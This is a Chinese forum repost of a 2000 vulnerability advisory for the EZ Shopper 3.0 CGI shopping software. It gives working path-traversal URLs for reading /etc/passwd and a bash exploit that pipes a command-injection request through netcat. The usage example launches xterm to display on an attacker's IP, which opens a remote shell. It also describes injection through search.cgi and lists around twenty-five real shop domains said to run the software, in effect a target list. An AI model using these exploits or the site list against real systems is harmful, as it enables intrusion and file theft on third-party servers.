发信人: netcc()
整理人: (2000-03-06 23:36:46), 站内信件
|
影响系统: EZ Shopper 3.0
平台: Unix, NT
类型: CGI输入检测问题
漏洞简介:
任何人都可以以web服务器运行身份在远程执行任意命令,可以读取web服务器文 件。
这个perl程序没有对输入进行有效的检测,用open()函数来执行用户提交的信 息。
漏洞检测说明:
(1) loadpage.cgi (可以用来查看任意文件)
首先用浏览器找到当前路径,如:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ
这时可能会返回一个错误信息:
Cannot open file /home/www/shop/XYZ
现在可以替换为下面的格式,如:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<路径 >/<文件名>
具体如下:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/ passwd
(2) loadpage.cgi (执行任意以web身份运行的命令)
利用下面脚本可以通过代理,借助netcat间接与服务器进行连接,脚本如下:
该脚本例如命名为ezshophack.sh
---------------------------------------------------
#!/bin/bash
echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&fi le=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080
---------------------------------------------------
用法如下:
$ ./ezshophack.sh /usr/X11R6/bin/xterm%20-display%20你的IP地址:0
具体如下,假如你的IP为100.100.100.100:
$ ./ezshophack.sh /usr/X11R6/bin/xterm%20-display%20100.100.100.100:0
(3) search.cgi - (查看文件和执行命令)
用管道命令替换数据库字段或者path/filename。
http://www.example.com/cgi-bin/search.cgi?user_id=1&database=<输入任意 信息>&template=<输入任意信息>&distinct=1
采用的该系统的服务器有,可以去altavista搜索。
floralstuff.com, amazinggates.com, onlinetraders.com, riccardosmarket. com, xstitches.com,
search4u.org , jojomamanbebe.co.uk, armysurplus.com, cheddarbox.com, f leamarketbooks.com,
framer.com, hkmusic.com, battenburg-lace-shirts.com, teamdawg.com , mu seek.net,
music123.com, candlesdelight.com, harvest.org, robertsliardon.org, or ganicstoyou.com,
classic-collectibles.com, finestkind.net, partytimesaver.com, kkorigin als.com, blackmetal.com
-- 我思念的城市已是黄昏,为何我总是对你一网情深!
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 210.75.33.201]
|
|